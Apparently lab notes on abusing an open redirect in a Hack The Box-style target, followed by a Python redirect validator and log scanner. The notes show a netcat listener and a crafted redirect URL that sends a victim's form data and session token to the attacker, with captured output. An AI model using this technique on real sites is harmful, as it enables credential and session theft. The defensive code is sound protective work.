CREDENTIAL THEFT

#craft a malicious URL that appears to come from a legitimate website but redirects users to a phishing page.
#users might think they're logging into the real service, but their credentials get stolen.

#walk the application
root@oco:~$ BROWSER > {targetSite:port}
 ...
 
 * submit expected input and identify potential entry points

#open redirect vulnerability
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > siteCookieValues
 Name: PHPSESSID (aka token)
 Value: ntrgep8modbid35j2me2thjjjt
 
 * if a token is included in the GET/POST request, it must be carried along in the crafted request as well: it could be a session or anti-CSRF token and is therefore useful to an attacker.

root@oco:~$ nc -nlvp 4444
root@oco:~$ BROWSER > {targetSite:port}/index.php?url={attackerNetcatListenerIP&Port}&token={tokenValue}

 * the target must submit input in the form for this to work
    - e.g., entering an email address on the form, etc.

root@oco:~$ nc...
 listening on [any] 4444 ...
 connect to [10.10.14.35] from (UNKNOWN) [10.10.14.35] 41650
 POST / HTTP/1.1
 Host: 10.10.14.35:4444
 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://oredirect.htb.net/
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 84
 Origin: http://oredirect.htb.net
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Sec-GPC: 1
 Priority: u=0, i

 email=null%40null.com&recover-submit=Reset+Password&token=ntrgep8modbid35j2me2thjjjt
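As a defensive counterpart to the open redirect above (an added example, not from the original notes): a Python validator for a redirect parameter such as `index.php?url=`, followed by a scan of constructed access-log lines that flags requests whose redirect target would be refused. The allowed host name, base URL, and log format are assumptions.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, urljoin, parse_qs

# Assumed: the only host this application may redirect to.
ALLOWED_HOSTS = {"oredirect.htb.net"}
BASE = "http://oredirect.htb.net/"


def safe_redirect_target(url: str, allowed_hosts=ALLOWED_HOSTS) -> Optional[str]:
    """Return an absolute same-site URL for `url`, or None if it must be refused.

    Rejects the patterns a naive "starts with /" check misses: absolute URLs
    to other hosts, scheme-relative '//host', backslash tricks that browsers
    treat as '//', embedded credentials ('host@evil'), and non-http schemes.
    """
    if not url or "\\" in url:
        return None
    if url.startswith("//"):
        return None                      # e.g. //10.10.14.35:4444/
    parts = urlsplit(url)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return None                      # javascript:, data:, ...
    if parts.netloc:
        # hostname strips port and userinfo; refuse any userinfo outright.
        if parts.username is not None or parts.hostname not in allowed_hosts:
            return None
        return url
    # Relative path: resolve against the site and re-check the host.
    resolved = urljoin(BASE, url)
    return resolved if urlsplit(resolved).hostname in allowed_hosts else None


LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed access-log lines in a common-log-style format (assumption).
SAMPLE_LOG = [
    '10.10.14.35 - - [01/Jan/2025:00:00:00 +0000] "GET /index.php?url=/account&token=TOKEN_PLACEHOLDER HTTP/1.1" 302 0',
    '10.10.14.35 - - [01/Jan/2025:00:00:01 +0000] "GET /index.php?url=http://10.10.14.35:4444&token=TOKEN_PLACEHOLDER HTTP/1.1" 302 0',
]


def flag_open_redirects(log_lines, param="url"):
    """Return (line, target) pairs whose redirect parameter points off-site."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        for target in parse_qs(urlsplit(m.group(1)).query).get(param, []):
            if safe_redirect_target(target) is None:
                hits.append((line, target))
    return hits
```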
